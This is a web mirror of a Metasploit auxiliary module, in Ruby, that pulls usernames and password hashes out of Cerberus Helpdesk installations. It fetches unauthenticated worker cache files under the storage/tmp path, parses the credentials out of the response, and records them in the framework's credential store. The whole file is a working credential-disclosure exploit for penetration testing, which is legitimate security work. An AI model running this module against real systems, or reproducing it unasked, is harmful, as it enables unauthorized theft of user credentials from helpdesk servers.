Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb
19722 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::HttpClient
8
include Msf::Auxiliary::Scanner
9
include Msf::Auxiliary::Report
10
11
def initialize
12
super(
13
'Name' => 'Cerberus Helpdesk User Hash Disclosure',
14
'Description' => %q{
15
This module extracts usernames and password hashes from the Cerberus Helpdesk
16
through an unauthenticated access to a workers file.
17
Verified on Version 4.2.3 Stable (Build 925) and 5.4.4
18
},
19
'References' => [
20
[ 'EDB', '39526' ]
21
],
22
'Author' => [
23
'asdizzle_', # discovery
24
'h00die', # module
25
],
26
'License' => MSF_LICENSE,
27
'DisclosureDate' => 'Mar 7 2016'
28
)
29
30
register_options(
31
[
32
OptString.new('TARGETURI', [false, 'URL of the Cerberus Helpdesk root', '/'])
33
]
34
)
35
end
36
37
def run_host(rhost)
38
begin
39
['devblocks', 'zend'].each do |site|
40
url = normalize_uri(datastore['TARGETURI'], 'storage', 'tmp', "#{site}_cache---ch_workers")
41
vprint_status("Attempting to load data from #{url}")
42
res = send_request_cgi({ 'uri' => url })
43
if !res
44
print_error("#{peer} Unable to connect to #{url}")
45
next
46
end
47
48
if !res.body.include?('pass')
49
print_error("Invalid response received for #{peer} for #{url}")
50
next
51
end
52
53
cred_table = Rex::Text::Table.new 'Header' => 'Cerberus Helpdesk User Credentials',
54
'Indent' => 1,
55
'Columns' => ['Username', 'Password Hash']
56
57
# the returned object looks json-ish, but it isn't. Unsure of format, so we'll do some ugly manual parsing.
58
# this will be a rough equivalent to sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g'
59
result = res.body.split('s:5')
60
result.each do |cred|
61
if cred.include?('email')
62
cred = cred.split(':')
63
username = cred[3].tr('";', '') # remove extra characters
64
username = username[0...-1] # also remove trailing s
65
password_hash = cred[7].tr('";', '') # remove extra characters
66
print_good("Found: #{username}:#{password_hash}")
67
store_valid_credential(
68
user: username,
69
private: password_hash,
70
private_type: :nonreplayable_hash
71
)
72
cred_table << [username, password_hash]
73
end
74
end
75
print_line
76
print_line cred_table.to_s
77
break
78
end
79
rescue ::Rex::ConnectionError
80
print_error("#{peer} Unable to connect to site")
81
return
82
end
83
end
84
end
85
86